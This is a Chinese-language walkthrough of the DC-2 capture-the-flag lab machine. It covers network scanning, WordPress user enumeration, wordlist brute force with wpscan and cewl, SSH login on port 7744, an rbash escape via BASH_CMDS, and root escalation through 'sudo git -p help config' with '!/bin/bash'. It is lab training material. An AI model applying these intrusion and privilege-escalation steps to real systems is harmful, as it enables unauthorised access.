环境配置

修改模式改为NAT模式

image-20260603155617458

image-20260603155606601

当前网段为192.168.100.0/24

信息搜集

首先扫描网段

1
arp-scan -l

image-20260603155852876

192.168.100.135就是目标靶机。nmap扫描一下

1
nmap -A 192.168.100.135

image-20260603160449778

扫描结果有80端口, Apache httpd 2.4.10 ((Debian)),

1
Did not follow redirect to http://dc-2/

访问ip被重定向到http://dc-2

首先配置host文件,在C:\Windows\System32\drivers\etc\host在文件末尾中添加

1
192.168.100.135 DC-2

再执行

1
ipconfig /flushdns

就可以访问网站。

web指纹信息

1
whatweb -v 192.168.100.135

image-20260603162226301

WordPress 4.7.10 + Apache2.4.10 Debian

漏洞利用

首先访问网站就可以得到flag1

image-20260603162518524

你常用的单词列表可能不管用,所以,或许你需要发挥一下自己的特长。

密码越多越好,但有时候你不可能每次都成功。

用一个账号登录,看看下一个flag。

如果找不到,就用另一个账号登录。

这里说到要登入,但是登入进去前端没有登入接口,dirsearch扫一下

image-20260603162951321

访问一下wp-login.php

image-20260603163119555

找到登入界面,尝试弱口令爆破无果,使用扫描WordPress站点的工具wpscan

1
wpscan --url 192.168.100.135 -e u

image-20260603191722896

扫出来了3个用户名,接下来使用cewl生成一个字典

1
cewl http://dc-2 >payload.txt

然后开始爆破

1
wpscan --url http://dc-2 -password payload.txt

image-20260603211304173

成功爆破出密码,登入jerry/adipiscing

image-20260603211737655

如果你无法利用 WordPress 走捷径,还有另一种方法。

希望你能找到其他切入点。

这里说找其他切入点,刚才nmap扫端口的时候只有这个80端口,这里其实有一个坑,默认扫描的是常见的1000端口,这里全量扫描

1
2
nmap -sV  192.168.100.135 -p-

image-20260603212717505

还有一个7744有ssh服务,用tom账号登入一下

1
ssh @tom192.168.100.135 -p 7744

登入成功读一下flag3.txt

image-20260603213149569

这里受到rbash的限制,使用less命令读文件

image-20260603213535306

可怜的老 Tom 总在追逐 Jerry,或许他可以通过su命令切换用户来解决问题。

这里切换一下用户需要绕过限制

1
2
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin

在jerry家找到了flag4.txt

image-20260603214213925

很高兴看到你走到这一步——但你还没到家呢。

你还需要拿到最后一面旗帜(唯一真正重要的旗帜!!!)。

这里没有任何提示——现在只能靠你自己了。:-)

加油——离开这里!!!!

需要jerry用户git提权到root

image-20260603214622820

这里看到看到可以免密执行git命令

1
2
sudo git -p help config
!/bin/bash

用 root 权限分页查看 git config 的帮助说明,-p是强制启用分页器less查看文档,运行后会进入到less分页阅读界面,less的一个功能就是输入 !+命令 就能直接调用系统 shell,而且当前整个进程是 root 权限,可以提权

image-20260603214718171

提权成功,得到flag

image-20260603214827654